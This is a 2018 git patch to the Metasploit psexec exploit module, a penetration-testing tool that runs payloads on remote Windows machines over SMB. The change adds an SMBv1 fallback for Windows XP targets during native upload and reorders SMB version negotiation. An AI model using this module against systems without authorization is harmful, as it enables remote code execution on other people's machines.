From 7f3dfccbfe66c4ef13e283cf4cb3562193121497 Mon Sep 17 00:00:00 2001
From: Jacob Robles <jrobles@rapid7.com>
Date: Mon, 2 Jul 2018 17:34:53 -0500
Subject: [PATCH] Land #10242, avoid using SMBv2 on Windows XP Native Upload
 targets

---
 modules/exploits/windows/smb/psexec.rb | 18 ++++++++++++++----
 1 file changed, 14 insertions(+), 4 deletions(-)

diff --git a/modules/exploits/windows/smb/psexec.rb b/modules/exploits/windows/smb/psexec.rb
index c271ee45e2..23620231d6 100644
--- a/modules/exploits/windows/smb/psexec.rb
+++ b/modules/exploits/windows/smb/psexec.rb
@@ -86,12 +86,22 @@ class MetasploitModule < Msf::Exploit::Remote
       ])
   end
 
+  def native_upload_with_workaround
+    # Avoid implementing NTLMSSP on Windows XP
+    # http://seclists.org/metasploit/2009/q1/6
+    if smb_peer_os == "Windows 5.1"
+      connect(versions: [1])
+      smb_login
+    end
+    native_upload(datastore['SHARE'])
+  end
+
   def exploit
     print_status("Connecting to the server...")
-    connect(versions: [1,2])
+    connect(versions: [2,1])
 
     print_status("Authenticating to #{smbhost} as user '#{splitname(datastore['SMBUser'])}'...")
-    smb_login()
+    smb_login
 
     if not simple.client.auth_user and not datastore['ALLOW_GUEST']
       print_line(" ")
@@ -117,12 +127,12 @@ class MetasploitModule < Msf::Exploit::Remote
         execute_powershell_payload
       else
         print_status('Selecting native target')
-        native_upload(datastore['SHARE'])
+        native_upload_with_workaround
       end
     when 'PowerShell'
       execute_powershell_payload
     when 'Native upload'
-      native_upload(datastore['SHARE'])
+      native_upload_with_workaround
     when 'MOF upload'
       mof_upload(datastore['SHARE'])
     end